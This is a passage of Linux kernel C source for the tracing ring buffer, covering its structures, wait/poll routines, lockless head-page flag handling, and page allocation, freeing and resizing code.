unsigned long read_bytes;
u64 write_stamp;
u64 read_stamp;
/* ring buffer pages to update, > 0 to add, < 0 to remove */
long nr_pages_to_update;
struct list_head new_pages; /* new pages to add */
struct work_struct update_pages_work;
struct completion update_done;
struct rb_irq_work irq_work;
};
struct ring_buffer {
unsigned flags;
int cpus;
atomic_t record_disabled;
atomic_t resize_disabled;
cpumask_var_t cpumask;
struct lock_class_key *reader_lock_key;
struct mutex mutex;
struct ring_buffer_per_cpu **buffers;
#ifdef CONFIG_HOTPLUG_CPU
struct notifier_block cpu_notify;
#endif
u64 (*clock)(void);
struct rb_irq_work irq_work;
};
struct ring_buffer_iter {
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long head;
struct buffer_page *head_page;
struct buffer_page *cache_reader_page;
unsigned long cache_read;
u64 read_stamp;
};
/*
* rb_wake_up_waiters - wake up tasks waiting for ring buffer input
*
* Schedules a delayed work to wake up any task that is blocked on the
* ring buffer waiters queue.
*/
static void rb_wake_up_waiters(struct irq_work *work)
{
struct rb_irq_work *rbwork = container_of(work, struct rb_irq_work, work);
wake_up_all(&rbwork->waiters);
if (rbwork->wakeup_full) {
rbwork->wakeup_full = false;
wake_up_all(&rbwork->full_waiters);
}
}
/**
* ring_buffer_wait - wait for input to the ring buffer
* @buffer: buffer to wait on
* @cpu: the cpu buffer to wait on
* @full: wait until a full page is available, if @cpu != RING_BUFFER_ALL_CPUS
*
* If @cpu == RING_BUFFER_ALL_CPUS then the task will wake up as soon
* as data is added to any of the @buffer's cpu buffers. Otherwise
* it will wait for data to be added to a specific cpu buffer.
*/
int ring_buffer_wait(struct ring_buffer *buffer, int cpu, bool full)
{
struct ring_buffer_per_cpu *uninitialized_var(cpu_buffer);
DEFINE_WAIT(wait);
struct rb_irq_work *work;
int ret = 0;
/*
* Depending on what the caller is waiting for, either any
* data in any cpu buffer, or a specific buffer, put the
* caller on the appropriate wait queue.
*/
if (cpu == RING_BUFFER_ALL_CPUS) {
work = &buffer->irq_work;
/* Full only makes sense on per cpu reads */
full = false;
} else {
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return -ENODEV;
cpu_buffer = buffer->buffers[cpu];
work = &cpu_buffer->irq_work;
}
while (true) {
if (full)
prepare_to_wait(&work->full_waiters, &wait, TASK_INTERRUPTIBLE);
else
prepare_to_wait(&work->waiters, &wait, TASK_INTERRUPTIBLE);
/*
* The events can happen in critical sections where
* checking a work queue can cause deadlocks.
* After adding a task to the queue, this flag is set
* only to notify events to try to wake up the queue
* using irq_work.
*
* We don't clear it even if the buffer is no longer
* empty. The flag only causes the next event to run
		 * irq_work to do the work queue wake up. The worst
* that can happen if we race with !trace_empty() is that
* an event will cause an irq_work to try to wake up
* an empty queue.
*
* There's no reason to protect this flag either, as
* the work queue and irq_work logic will do the necessary
* synchronization for the wake ups. The only thing
* that is necessary is that the wake up happens after
* a task has been queued. It's OK for spurious wake ups.
*/
if (full)
work->full_waiters_pending = true;
else
work->waiters_pending = true;
if (signal_pending(current)) {
ret = -EINTR;
break;
}
if (cpu == RING_BUFFER_ALL_CPUS && !ring_buffer_empty(buffer))
break;
if (cpu != RING_BUFFER_ALL_CPUS &&
!ring_buffer_empty_cpu(buffer, cpu)) {
unsigned long flags;
bool pagebusy;
if (!full)
break;
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
pagebusy = cpu_buffer->reader_page == cpu_buffer->commit_page;
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
if (!pagebusy)
break;
}
schedule();
}
if (full)
finish_wait(&work->full_waiters, &wait);
else
finish_wait(&work->waiters, &wait);
return ret;
}
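/*
 * Typical use (illustrative sketch, error handling elided): a reader that
 * wants to block until per-cpu data arrives might do
 *
 *	ret = ring_buffer_wait(buffer, cpu, false);
 *	if (ret == 0 && !ring_buffer_empty_cpu(buffer, cpu))
 *		... read events from the cpu buffer ...
 *
 * Passing full == true instead keeps waiting until the reader page is no
 * longer the commit page, i.e. until a whole page of data can be handed
 * out.
 */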
/**
* ring_buffer_poll_wait - poll on buffer input
* @buffer: buffer to wait on
* @cpu: the cpu buffer to wait on
* @filp: the file descriptor
* @poll_table: The poll descriptor
*
* If @cpu == RING_BUFFER_ALL_CPUS then the task will wake up as soon
* as data is added to any of the @buffer's cpu buffers. Otherwise
* it will wait for data to be added to a specific cpu buffer.
*
* Returns POLLIN | POLLRDNORM if data exists in the buffers,
* zero otherwise.
*/
int ring_buffer_poll_wait(struct ring_buffer *buffer, int cpu,
struct file *filp, poll_table *poll_table)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct rb_irq_work *work;
if (cpu == RING_BUFFER_ALL_CPUS)
work = &buffer->irq_work;
else {
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return -EINVAL;
cpu_buffer = buffer->buffers[cpu];
work = &cpu_buffer->irq_work;
}
poll_wait(filp, &work->waiters, poll_table);
work->waiters_pending = true;
/*
* There's a tight race between setting the waiters_pending and
* checking if the ring buffer is empty. Once the waiters_pending bit
* is set, the next event will wake the task up, but we can get stuck
* if there's only a single event in.
*
* FIXME: Ideally, we need a memory barrier on the writer side as well,
* but adding a memory barrier to all events will cause too much of a
* performance hit in the fast path. We only need a memory barrier when
* the buffer goes from empty to having content. But as this race is
* extremely small, and it's not a problem if another event comes in, we
* will fix it later.
*/
smp_mb();
if ((cpu == RING_BUFFER_ALL_CPUS && !ring_buffer_empty(buffer)) ||
(cpu != RING_BUFFER_ALL_CPUS && !ring_buffer_empty_cpu(buffer, cpu)))
return POLLIN | POLLRDNORM;
return 0;
}
/* buffer may be either ring_buffer or ring_buffer_per_cpu */
#define RB_WARN_ON(b, cond) \
({ \
int _____ret = unlikely(cond); \
if (_____ret) { \
if (__same_type(*(b), struct ring_buffer_per_cpu)) { \
struct ring_buffer_per_cpu *__b = \
(void *)b; \
atomic_inc(&__b->buffer->record_disabled); \
} else \
atomic_inc(&b->record_disabled); \
WARN_ON(1); \
} \
_____ret; \
})
/* Up this if you want to test the TIME_EXTENTS and normalization */
#define DEBUG_SHIFT 0
static inline u64 rb_time_stamp(struct ring_buffer *buffer)
{
/* shift to debug/test normalization and TIME_EXTENTS */
return buffer->clock() << DEBUG_SHIFT;
}
u64 ring_buffer_time_stamp(struct ring_buffer *buffer, int cpu)
{
u64 time;
preempt_disable_notrace();
time = rb_time_stamp(buffer);
preempt_enable_no_resched_notrace();
return time;
}
EXPORT_SYMBOL_GPL(ring_buffer_time_stamp);
void ring_buffer_normalize_time_stamp(struct ring_buffer *buffer,
int cpu, u64 *ts)
{
/* Just stupid testing the normalize function and deltas */
*ts >>= DEBUG_SHIFT;
}
EXPORT_SYMBOL_GPL(ring_buffer_normalize_time_stamp);
/*
* Making the ring buffer lockless makes things tricky.
* Although writes only happen on the CPU that they are on,
* and they only need to worry about interrupts. Reads can
* happen on any CPU.
*
* The reader page is always off the ring buffer, but when the
* reader finishes with a page, it needs to swap its page with
* a new one from the buffer. The reader needs to take from
* the head (writes go to the tail). But if a writer is in overwrite
* mode and wraps, it must push the head page forward.
*
* Here lies the problem.
*
* The reader must be careful to replace only the head page, and
* not another one. As described at the top of the file in the
* ASCII art, the reader sets its old page to point to the next
* page after head. It then sets the page after head to point to
* the old reader page. But if the writer moves the head page
* during this operation, the reader could end up with the tail.
*
* We use cmpxchg to help prevent this race. We also do something
* special with the page before head. We set the LSB to 1.
*
* When the writer must push the page forward, it will clear the
* bit that points to the head page, move the head, and then set
* the bit that points to the new head page.
*
* We also don't want an interrupt coming in and moving the head
* page on another writer. Thus we use the second LSB to catch
* that too. Thus:
*
* head->list->prev->next bit 1 bit 0
* ------- -------
* Normal page 0 0
* Points to head page 0 1
* New head page 1 0
*
* Note we can not trust the prev pointer of the head page, because:
*
* +----+ +-----+ +-----+
* | |------>| T |---X--->| N |
* | |<------| | | |
* +----+ +-----+ +-----+
* ^ ^ |
* | +-----+ | |
* +----------| R |----------+ |
* | |<-----------+
* +-----+
*
* Key: ---X--> HEAD flag set in pointer
* T Tail page
* R Reader page
* N Next page
*
* (see __rb_reserve_next() to see where this happens)
*
* What the above shows is that the reader just swapped out
* the reader page with a page in the buffer, but before it
* could make the new header point back to the new page added
* it was preempted by a writer. The writer moved forward onto
* the new page added by the reader and is about to move forward
* again.
*
* You can see, it is legitimate for the previous pointer of
* the head (or any page) not to point back to itself. But only
 * temporarily.
*/
#define RB_PAGE_NORMAL 0UL
#define RB_PAGE_HEAD 1UL
#define RB_PAGE_UPDATE 2UL
#define RB_FLAG_MASK 3UL
/* PAGE_MOVED is not part of the mask */
#define RB_PAGE_MOVED 4UL
/*
* rb_list_head - remove any bit
*/
static struct list_head *rb_list_head(struct list_head *list)
{
unsigned long val = (unsigned long)list;
return (struct list_head *)(val & ~RB_FLAG_MASK);
}
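/*
 * Example (illustrative): a "next" pointer tagged by the writer decodes as
 *
 *	val = (unsigned long)list->next;
 *	(val & RB_FLAG_MASK) == RB_PAGE_HEAD  -> the page this pointer leads
 *	                                         to is the head page
 *	rb_list_head(list->next)              -> the same pointer with the
 *	                                         flag bits stripped off
 *
 * rb_is_head_page() below relies on exactly this decoding.
 */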
/*
* rb_is_head_page - test if the given page is the head page
*
* Because the reader may move the head_page pointer, we can
* not trust what the head page is (it may be pointing to
* the reader page). But if the next page is a header page,
* its flags will be non zero.
*/
static inline int
rb_is_head_page(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *page, struct list_head *list)
{
unsigned long val;
val = (unsigned long)list->next;
if ((val & ~RB_FLAG_MASK) != (unsigned long)&page->list)
return RB_PAGE_MOVED;
return val & RB_FLAG_MASK;
}
/*
* rb_is_reader_page
*
 * The unique thing about the reader page is that, if the
* writer is ever on it, the previous pointer never points
* back to the reader page.
*/
static bool rb_is_reader_page(struct buffer_page *page)
{
struct list_head *list = page->list.prev;
return rb_list_head(list->next) != &page->list;
}
/*
* rb_set_list_to_head - set a list_head to be pointing to head.
*/
static void rb_set_list_to_head(struct ring_buffer_per_cpu *cpu_buffer,
struct list_head *list)
{
unsigned long *ptr;
ptr = (unsigned long *)&list->next;
*ptr |= RB_PAGE_HEAD;
*ptr &= ~RB_PAGE_UPDATE;
}
/*
* rb_head_page_activate - sets up head page
*/
static void rb_head_page_activate(struct ring_buffer_per_cpu *cpu_buffer)
{
struct buffer_page *head;
head = cpu_buffer->head_page;
if (!head)
return;
/*
* Set the previous list pointer to have the HEAD flag.
*/
rb_set_list_to_head(cpu_buffer, head->list.prev);
}
static void rb_list_head_clear(struct list_head *list)
{
unsigned long *ptr = (unsigned long *)&list->next;
*ptr &= ~RB_FLAG_MASK;
}
/*
 * rb_head_page_deactivate - clears head page ptr (for free list)
*/
static void
rb_head_page_deactivate(struct ring_buffer_per_cpu *cpu_buffer)
{
struct list_head *hd;
/* Go through the whole list and clear any pointers found. */
rb_list_head_clear(cpu_buffer->pages);
list_for_each(hd, cpu_buffer->pages)
rb_list_head_clear(hd);
}
static int rb_head_page_set(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *head,
struct buffer_page *prev,
int old_flag, int new_flag)
{
struct list_head *list;
unsigned long val = (unsigned long)&head->list;
unsigned long ret;
list = &prev->list;
val &= ~RB_FLAG_MASK;
ret = cmpxchg((unsigned long *)&list->next,
val | old_flag, val | new_flag);
/* check if the reader took the page */
if ((ret & ~RB_FLAG_MASK) != val)
return RB_PAGE_MOVED;
return ret & RB_FLAG_MASK;
}
static int rb_head_page_set_update(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *head,
struct buffer_page *prev,
int old_flag)
{
return rb_head_page_set(cpu_buffer, head, prev,
old_flag, RB_PAGE_UPDATE);
}
static int rb_head_page_set_head(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *head,
struct buffer_page *prev,
int old_flag)
{
return rb_head_page_set(cpu_buffer, head, prev,
old_flag, RB_PAGE_HEAD);
}
static int rb_head_page_set_normal(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *head,
struct buffer_page *prev,
int old_flag)
{
return rb_head_page_set(cpu_buffer, head, prev,
old_flag, RB_PAGE_NORMAL);
}
static inline void rb_inc_page(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page **bpage)
{
struct list_head *p = rb_list_head((*bpage)->list.next);
*bpage = list_entry(p, struct buffer_page, list);
}
static struct buffer_page *
rb_set_head_page(struct ring_buffer_per_cpu *cpu_buffer)
{
struct buffer_page *head;
struct buffer_page *page;
struct list_head *list;
int i;
if (RB_WARN_ON(cpu_buffer, !cpu_buffer->head_page))
return NULL;
/* sanity check */
list = cpu_buffer->pages;
if (RB_WARN_ON(cpu_buffer, rb_list_head(list->prev->next) != list))
return NULL;
page = head = cpu_buffer->head_page;
/*
* It is possible that the writer moves the header behind
* where we started, and we miss in one loop.
* A second loop should grab the header, but we'll do
* three loops just because I'm paranoid.
*/
for (i = 0; i < 3; i++) {
do {
if (rb_is_head_page(cpu_buffer, page, page->list.prev)) {
cpu_buffer->head_page = page;
return page;
}
rb_inc_page(cpu_buffer, &page);
} while (page != head);
}
RB_WARN_ON(cpu_buffer, 1);
return NULL;
}
static int rb_head_page_replace(struct buffer_page *old,
struct buffer_page *new)
{
unsigned long *ptr = (unsigned long *)&old->list.prev->next;
unsigned long val;
unsigned long ret;
val = *ptr & ~RB_FLAG_MASK;
val |= RB_PAGE_HEAD;
ret = cmpxchg(ptr, val, (unsigned long)&new->list);
return ret == val;
}
/*
* rb_tail_page_update - move the tail page forward
*/
static void rb_tail_page_update(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *tail_page,
struct buffer_page *next_page)
{
unsigned long old_entries;
unsigned long old_write;
/*
* The tail page now needs to be moved forward.
*
* We need to reset the tail page, but without messing
* with possible erasing of data brought in by interrupts
* that have moved the tail page and are currently on it.
*
* We add a counter to the write field to denote this.
*/
old_write = local_add_return(RB_WRITE_INTCNT, &next_page->write);
old_entries = local_add_return(RB_WRITE_INTCNT, &next_page->entries);
/*
* Just make sure we have seen our old_write and synchronize
* with any interrupts that come in.
*/
barrier();
/*
* If the tail page is still the same as what we think
* it is, then it is up to us to update the tail
* pointer.
*/
if (tail_page == READ_ONCE(cpu_buffer->tail_page)) {
/* Zero the write counter */
unsigned long val = old_write & ~RB_WRITE_MASK;
unsigned long eval = old_entries & ~RB_WRITE_MASK;
/*
* This will only succeed if an interrupt did
* not come in and change it. In which case, we
* do not want to modify it.
*
* We add (void) to let the compiler know that we do not care
* about the return value of these functions. We use the
* cmpxchg to only update if an interrupt did not already
* do it for us. If the cmpxchg fails, we don't care.
*/
(void)local_cmpxchg(&next_page->write, old_write, val);
(void)local_cmpxchg(&next_page->entries, old_entries, eval);
/*
* No need to worry about races with clearing out the commit.
* it only can increment when a commit takes place. But that
* only happens in the outer most nested commit.
*/
local_set(&next_page->page->commit, 0);
/* Again, either we update tail_page or an interrupt does */
(void)cmpxchg(&cpu_buffer->tail_page, tail_page, next_page);
}
}
static int rb_check_bpage(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *bpage)
{
unsigned long val = (unsigned long)bpage;
if (RB_WARN_ON(cpu_buffer, val & RB_FLAG_MASK))
return 1;
return 0;
}
/**
* rb_check_list - make sure a pointer to a list has the last bits zero
*/
static int rb_check_list(struct ring_buffer_per_cpu *cpu_buffer,
struct list_head *list)
{
if (RB_WARN_ON(cpu_buffer, rb_list_head(list->prev) != list->prev))
return 1;
if (RB_WARN_ON(cpu_buffer, rb_list_head(list->next) != list->next))
return 1;
return 0;
}
/**
* rb_check_pages - integrity check of buffer pages
* @cpu_buffer: CPU buffer with pages to test
*
* As a safety measure we check to make sure the data pages have not
* been corrupted.
*/
static int rb_check_pages(struct ring_buffer_per_cpu *cpu_buffer)
{
struct list_head *head = cpu_buffer->pages;
struct buffer_page *bpage, *tmp;
/* Reset the head page if it exists */
if (cpu_buffer->head_page)
rb_set_head_page(cpu_buffer);
rb_head_page_deactivate(cpu_buffer);
if (RB_WARN_ON(cpu_buffer, head->next->prev != head))
return -1;
if (RB_WARN_ON(cpu_buffer, head->prev->next != head))
return -1;
if (rb_check_list(cpu_buffer, head))
return -1;
list_for_each_entry_safe(bpage, tmp, head, list) {
if (RB_WARN_ON(cpu_buffer,
bpage->list.next->prev != &bpage->list))
return -1;
if (RB_WARN_ON(cpu_buffer,
bpage->list.prev->next != &bpage->list))
return -1;
if (rb_check_list(cpu_buffer, &bpage->list))
return -1;
}
rb_head_page_activate(cpu_buffer);
return 0;
}
static int __rb_allocate_pages(long nr_pages, struct list_head *pages, int cpu)
{
struct buffer_page *bpage, *tmp;
long i;
for (i = 0; i < nr_pages; i++) {
struct page *page;
/*
* __GFP_NORETRY flag makes sure that the allocation fails
* gracefully without invoking oom-killer and the system is
* not destabilized.
*/
bpage = kzalloc_node(ALIGN(sizeof(*bpage), cache_line_size()),
GFP_KERNEL | __GFP_NORETRY,
cpu_to_node(cpu));
if (!bpage)
goto free_pages;
list_add(&bpage->list, pages);
page = alloc_pages_node(cpu_to_node(cpu),
GFP_KERNEL | __GFP_NORETRY, 0);
if (!page)
goto free_pages;
bpage->page = page_address(page);
rb_init_page(bpage->page);
}
return 0;
free_pages:
list_for_each_entry_safe(bpage, tmp, pages, list) {
list_del_init(&bpage->list);
free_buffer_page(bpage);
}
return -ENOMEM;
}
static int rb_allocate_pages(struct ring_buffer_per_cpu *cpu_buffer,
unsigned long nr_pages)
{
LIST_HEAD(pages);
WARN_ON(!nr_pages);
if (__rb_allocate_pages(nr_pages, &pages, cpu_buffer->cpu))
return -ENOMEM;
/*
* The ring buffer page list is a circular list that does not
* start and end with a list head. All page list items point to
* other pages.
*/
cpu_buffer->pages = pages.next;
list_del(&pages);
cpu_buffer->nr_pages = nr_pages;
rb_check_pages(cpu_buffer);
return 0;
}
static struct ring_buffer_per_cpu *
rb_allocate_cpu_buffer(struct ring_buffer *buffer, long nr_pages, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct buffer_page *bpage;
struct page *page;
int ret;
cpu_buffer = kzalloc_node(ALIGN(sizeof(*cpu_buffer), cache_line_size()),
GFP_KERNEL, cpu_to_node(cpu));
if (!cpu_buffer)
return NULL;
cpu_buffer->cpu = cpu;
cpu_buffer->buffer = buffer;
raw_spin_lock_init(&cpu_buffer->reader_lock);
lockdep_set_class(&cpu_buffer->reader_lock, buffer->reader_lock_key);
cpu_buffer->lock = (arch_spinlock_t)__ARCH_SPIN_LOCK_UNLOCKED;
INIT_WORK(&cpu_buffer->update_pages_work, update_pages_handler);
init_completion(&cpu_buffer->update_done);
init_irq_work(&cpu_buffer->irq_work.work, rb_wake_up_waiters);
init_waitqueue_head(&cpu_buffer->irq_work.waiters);
init_waitqueue_head(&cpu_buffer->irq_work.full_waiters);
bpage = kzalloc_node(ALIGN(sizeof(*bpage), cache_line_size()),
GFP_KERNEL, cpu_to_node(cpu));
if (!bpage)
goto fail_free_buffer;
rb_check_bpage(cpu_buffer, bpage);
cpu_buffer->reader_page = bpage;
page = alloc_pages_node(cpu_to_node(cpu), GFP_KERNEL, 0);
if (!page)
goto fail_free_reader;
bpage->page = page_address(page);
rb_init_page(bpage->page);
INIT_LIST_HEAD(&cpu_buffer->reader_page->list);
INIT_LIST_HEAD(&cpu_buffer->new_pages);
ret = rb_allocate_pages(cpu_buffer, nr_pages);
if (ret < 0)
goto fail_free_reader;
cpu_buffer->head_page
= list_entry(cpu_buffer->pages, struct buffer_page, list);
cpu_buffer->tail_page = cpu_buffer->commit_page = cpu_buffer->head_page;
rb_head_page_activate(cpu_buffer);
return cpu_buffer;
fail_free_reader:
free_buffer_page(cpu_buffer->reader_page);
fail_free_buffer:
kfree(cpu_buffer);
return NULL;
}
static void rb_free_cpu_buffer(struct ring_buffer_per_cpu *cpu_buffer)
{
struct list_head *head = cpu_buffer->pages;
struct buffer_page *bpage, *tmp;
free_buffer_page(cpu_buffer->reader_page);
rb_head_page_deactivate(cpu_buffer);
if (head) {
list_for_each_entry_safe(bpage, tmp, head, list) {
list_del_init(&bpage->list);
free_buffer_page(bpage);
}
bpage = list_entry(head, struct buffer_page, list);
free_buffer_page(bpage);
}
kfree(cpu_buffer);
}
#ifdef CONFIG_HOTPLUG_CPU
static int rb_cpu_notify(struct notifier_block *self,
unsigned long action, void *hcpu);
#endif
/**
* __ring_buffer_alloc - allocate a new ring_buffer
* @size: the size in bytes per cpu that is needed.
* @flags: attributes to set for the ring buffer.
*
* Currently the only flag that is available is the RB_FL_OVERWRITE
* flag. This flag means that the buffer will overwrite old data
* when the buffer wraps. If this flag is not set, the buffer will
* drop data when the tail hits the head.
*/
struct ring_buffer *__ring_buffer_alloc(unsigned long size, unsigned flags,
struct lock_class_key *key)
{
struct ring_buffer *buffer;
long nr_pages;
int bsize;
int cpu;
/* keep it in its own cache line */
buffer = kzalloc(ALIGN(sizeof(*buffer), cache_line_size()),
GFP_KERNEL);
if (!buffer)
return NULL;
if (!alloc_cpumask_var(&buffer->cpumask, GFP_KERNEL))
goto fail_free_buffer;
nr_pages = DIV_ROUND_UP(size, BUF_PAGE_SIZE);
buffer->flags = flags;
buffer->clock = trace_clock_local;
buffer->reader_lock_key = key;
init_irq_work(&buffer->irq_work.work, rb_wake_up_waiters);
init_waitqueue_head(&buffer->irq_work.waiters);
/* need at least two pages */
if (nr_pages < 2)
nr_pages = 2;
/*
* In case of non-hotplug cpu, if the ring-buffer is allocated
* in early initcall, it will not be notified of secondary cpus.
* In that off case, we need to allocate for all possible cpus.
*/
#ifdef CONFIG_HOTPLUG_CPU
cpu_notifier_register_begin();
cpumask_copy(buffer->cpumask, cpu_online_mask);
#else
cpumask_copy(buffer->cpumask, cpu_possible_mask);
#endif
buffer->cpus = nr_cpu_ids;
bsize = sizeof(void *) * nr_cpu_ids;
buffer->buffers = kzalloc(ALIGN(bsize, cache_line_size()),
GFP_KERNEL);
if (!buffer->buffers)
goto fail_free_cpumask;
for_each_buffer_cpu(buffer, cpu) {
buffer->buffers[cpu] =
rb_allocate_cpu_buffer(buffer, nr_pages, cpu);
if (!buffer->buffers[cpu])
goto fail_free_buffers;
}
#ifdef CONFIG_HOTPLUG_CPU
buffer->cpu_notify.notifier_call = rb_cpu_notify;
buffer->cpu_notify.priority = 0;
__register_cpu_notifier(&buffer->cpu_notify);
cpu_notifier_register_done();
#endif
mutex_init(&buffer->mutex);
return buffer;
fail_free_buffers:
for_each_buffer_cpu(buffer, cpu) {
if (buffer->buffers[cpu])
rb_free_cpu_buffer(buffer->buffers[cpu]);
}
kfree(buffer->buffers);
fail_free_cpumask:
free_cpumask_var(buffer->cpumask);
#ifdef CONFIG_HOTPLUG_CPU
cpu_notifier_register_done();
#endif
fail_free_buffer:
kfree(buffer);
return NULL;
}
EXPORT_SYMBOL_GPL(__ring_buffer_alloc);
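/*
 * Callers normally reach this through the ring_buffer_alloc(size, flags)
 * wrapper in the header (not shown here), which supplies the lock class
 * key. An illustrative allocation of one megabyte per cpu in overwrite
 * mode:
 *
 *	buffer = ring_buffer_alloc(1024 * 1024, RB_FL_OVERWRITE);
 *	if (!buffer)
 *		return -ENOMEM;
 *
 * The buffer is torn down again with ring_buffer_free(buffer).
 */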
/**
* ring_buffer_free - free a ring buffer.
* @buffer: the buffer to free.
*/
void
ring_buffer_free(struct ring_buffer *buffer)
{
int cpu;
#ifdef CONFIG_HOTPLUG_CPU
cpu_notifier_register_begin();
__unregister_cpu_notifier(&buffer->cpu_notify);
#endif
for_each_buffer_cpu(buffer, cpu)
rb_free_cpu_buffer(buffer->buffers[cpu]);
#ifdef CONFIG_HOTPLUG_CPU
cpu_notifier_register_done();
#endif
kfree(buffer->buffers);
free_cpumask_var(buffer->cpumask);
kfree(buffer);
}
EXPORT_SYMBOL_GPL(ring_buffer_free);
void ring_buffer_set_clock(struct ring_buffer *buffer,
u64 (*clock)(void))
{
buffer->clock = clock;
}
static void rb_reset_cpu(struct ring_buffer_per_cpu *cpu_buffer);
static inline unsigned long rb_page_entries(struct buffer_page *bpage)
{
return local_read(&bpage->entries) & RB_WRITE_MASK;
}
static inline unsigned long rb_page_write(struct buffer_page *bpage)
{
return local_read(&bpage->write) & RB_WRITE_MASK;
}
static int
rb_remove_pages(struct ring_buffer_per_cpu *cpu_buffer, unsigned long nr_pages)
{
struct list_head *tail_page, *to_remove, *next_page;
struct buffer_page *to_remove_page, *tmp_iter_page;
struct buffer_page *last_page, *first_page;
unsigned long nr_removed;
unsigned long head_bit;
int page_entries;
head_bit = 0;
raw_spin_lock_irq(&cpu_buffer->reader_lock);
atomic_inc(&cpu_buffer->record_disabled);
/*
* We don't race with the readers since we have acquired the reader
* lock. We also don't race with writers after disabling recording.
* This makes it easy to figure out the first and the last page to be
* removed from the list. We unlink all the pages in between including
* the first and last pages. This is done in a busy loop so that we
* lose the least number of traces.
* The pages are freed after we restart recording and unlock readers.
*/
tail_page = &cpu_buffer->tail_page->list;
/*
	 * The tail page might be on the reader page: in that case we remove
	 * the next page from the ring buffer instead
*/
if (cpu_buffer->tail_page == cpu_buffer->reader_page)
tail_page = rb_list_head(tail_page->next);
to_remove = tail_page;
/* start of pages to remove */
first_page = list_entry(rb_list_head(to_remove->next),
struct buffer_page, list);
for (nr_removed = 0; nr_removed < nr_pages; nr_removed++) {
to_remove = rb_list_head(to_remove)->next;
head_bit |= (unsigned long)to_remove & RB_PAGE_HEAD;
}
next_page = rb_list_head(to_remove)->next;
/*
* Now we remove all pages between tail_page and next_page.
* Make sure that we have head_bit value preserved for the
* next page
*/
tail_page->next = (struct list_head *)((unsigned long)next_page |
head_bit);
next_page = rb_list_head(next_page);
next_page->prev = tail_page;
/* make sure pages points to a valid page in the ring buffer */
cpu_buffer->pages = next_page;
/* update head page */
if (head_bit)
cpu_buffer->head_page = list_entry(next_page,
struct buffer_page, list);
/*
* change read pointer to make sure any read iterators reset
* themselves
*/
cpu_buffer->read = 0;
/* pages are removed, resume tracing and then free the pages */
atomic_dec(&cpu_buffer->record_disabled);
raw_spin_unlock_irq(&cpu_buffer->reader_lock);
RB_WARN_ON(cpu_buffer, list_empty(cpu_buffer->pages));
/* last buffer page to remove */
last_page = list_entry(rb_list_head(to_remove), struct buffer_page,
list);
tmp_iter_page = first_page;
do {
to_remove_page = tmp_iter_page;
rb_inc_page(cpu_buffer, &tmp_iter_page);
/* update the counters */
page_entries = rb_page_entries(to_remove_page);
if (page_entries) {
/*
* If something was added to this page, it was full
* since it is not the tail page. So we deduct the
* bytes consumed in ring buffer from here.
* Increment overrun to account for the lost events.
*/
local_add(page_entries, &cpu_buffer->overrun);
local_sub(BUF_PAGE_SIZE, &cpu_buffer->entries_bytes);
}
/*
* We have already removed references to this list item, just
* free up the buffer_page and its page
*/
free_buffer_page(to_remove_page);
nr_removed--;
} while (to_remove_page != last_page);
RB_WARN_ON(cpu_buffer, nr_removed);
return nr_removed == 0;
}
static int
rb_insert_pages(struct ring_buffer_per_cpu *cpu_buffer)
{
struct list_head *pages = &cpu_buffer->new_pages;
int retries, success;
raw_spin_lock_irq(&cpu_buffer->reader_lock);
/*
* We are holding the reader lock, so the reader page won't be swapped
* in the ring buffer. Now we are racing with the writer trying to
* move head page and the tail page.
* We are going to adapt the reader page update process where:
* 1. We first splice the start and end of list of new pages between
* the head page and its previous page.
* 2. We cmpxchg the prev_page->next to point from head page to the
* start of new pages list.
* 3. Finally, we update the head->prev to the end of new list.
*
* We will try this process 10 times, to make sure that we don't keep
* spinning.
*/
retries = 10;
success = 0;
while (retries--) {
struct list_head *head_page, *prev_page, *r;
struct list_head *last_page, *first_page;
struct list_head *head_page_with_bit;
head_page = &rb_set_head_page(cpu_buffer)->list;
if (!head_page)
break;
prev_page = head_page->prev;
first_page = pages->next;
last_page = pages->prev;
head_page_with_bit = (struct list_head *)
((unsigned long)head_page | RB_PAGE_HEAD);
last_page->next = head_page_with_bit;
first_page->prev = prev_page;
r = cmpxchg(&prev_page->next, head_page_with_bit, first_page);
if (r == head_page_with_bit) {
/*
* yay, we replaced the page pointer to our new list,
			 * now we just have to update the head page's prev
			 * pointer to point to the end of the new list
*/
head_page->prev = last_page;
success = 1;
break;
}
}
if (success)
INIT_LIST_HEAD(pages);
/*
* If we weren't successful in adding in new pages, warn and stop
* tracing
*/
RB_WARN_ON(cpu_buffer, !success);
raw_spin_unlock_irq(&cpu_buffer->reader_lock);
/* free pages if they weren't inserted */
if (!success) {
struct buffer_page *bpage, *tmp;
list_for_each_entry_safe(bpage, tmp, &cpu_buffer->new_pages,
list) {
list_del_init(&bpage->list);
free_buffer_page(bpage);
}
}
return success;
}
static void rb_update_pages(struct ring_buffer_per_cpu *cpu_buffer)
{
int success;
if (cpu_buffer->nr_pages_to_update > 0)
success = rb_insert_pages(cpu_buffer);
else
success = rb_remove_pages(cpu_buffer,
-cpu_buffer->nr_pages_to_update);
if (success)
cpu_buffer->nr_pages += cpu_buffer->nr_pages_to_update;
}
static void update_pages_handler(struct work_struct *work)
{
struct ring_buffer_per_cpu *cpu_buffer = container_of(work,
struct ring_buffer_per_cpu, update_pages_work);
rb_update_pages(cpu_buffer);
complete(&cpu_buffer->update_done);
}
/**
* ring_buffer_resize - resize the ring buffer
* @buffer: the buffer to resize.
* @size: the new size.
* @cpu_id: the cpu buffer to resize
*
* Minimum size is 2 * BUF_PAGE_SIZE.
*
 * Returns the new size (rounded up to a multiple of BUF_PAGE_SIZE) on
 * success and < 0 on failure.
*/
int ring_buffer_resize(struct ring_buffer *buffer, unsigned long size,
int cpu_id)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long nr_pages;
int cpu, err = 0;
/*
* Always succeed at resizing a non-existent buffer:
*/
if (!buffer)
return size;
/* Make sure the requested buffer exists */
if (cpu_id != RING_BUFFER_ALL_CPUS &&
